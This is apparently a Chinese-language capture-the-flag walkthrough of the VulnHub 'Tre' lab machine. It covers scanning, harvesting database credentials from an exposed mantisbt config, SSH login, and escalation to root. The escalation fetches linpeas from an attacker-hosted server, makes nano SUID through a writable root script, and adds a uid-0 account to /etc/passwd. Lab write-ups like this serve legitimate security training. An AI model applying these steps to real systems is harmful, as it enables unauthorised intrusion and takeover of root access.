今天實踐的是vulnhub的Tre鏡像,
下載地址,https://download.vulnhub.com/tre/Tre.zip,
用workstation導入,做地址掃描,
sudo netdiscover -r 192.168.177.0/24,有地址了,130就是,

sudo nmap -sS -sV -T5 -A -p- 192.168.177.130,

有web服務,做一下php文件掃描,
dirb http://192.168.177.130 /usr/share/wordlists/dirb/big.txt -X .php,

瀏覽器訪問http://192.168.177.130/adminer.php,

繼續做目錄掃描,
dirb http://192.168.177.130 /usr/share/wordlists/dirb/big.txt,

繼續瀏覽器訪問http://192.168.177.130/mantisbt/config,

獲取到用戶名密碼信息,
username: mantissuser
password: password@123AS
database: mantis
瀏覽器登錄http://192.168.177.130/adminer.php,

找到用戶名密碼的信息,

獲取到tre/Tr3@123456A!,
ssh登錄,ssh tre@192.168.177.130,不是root,需要提權,

用linpeas查找root權限程序,
下載目前最新版本,wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh,
開個http下載服務,python2 -m SimpleHTTPServer,
進入臨時目錄,cd /tmp,
下載wget http://192.168.177.131:8000/linpeas.sh,
修改權限,chmod +x linpeas.sh,執行,./linpeas.sh,

獲取到/usr/bin/check-system,
查看權限,ls -la /usr/bin/check-system,
尋找nano,whereis nano,查看權限,ls -la /usr/bin/nano,
編輯check-system,/usr/bin/nano /usr/bin/check-system,

加入chmod +s /usr/bin/nano,

sudo -l查看,

重啟系統,sudo shutdown -r now,
重啟后查看nano權限,ls -la /usr/bin/nano,
編輯passwd文件,/usr/bin/nano /etc/passwd,
加入hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash

切到hacker,su hacker,id確認是root,

云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
D1Net
安全牛
GoUpSec
數世咨詢
數說安全
中國信息安全
奇安信集團
D1Net
安全圈
安全圈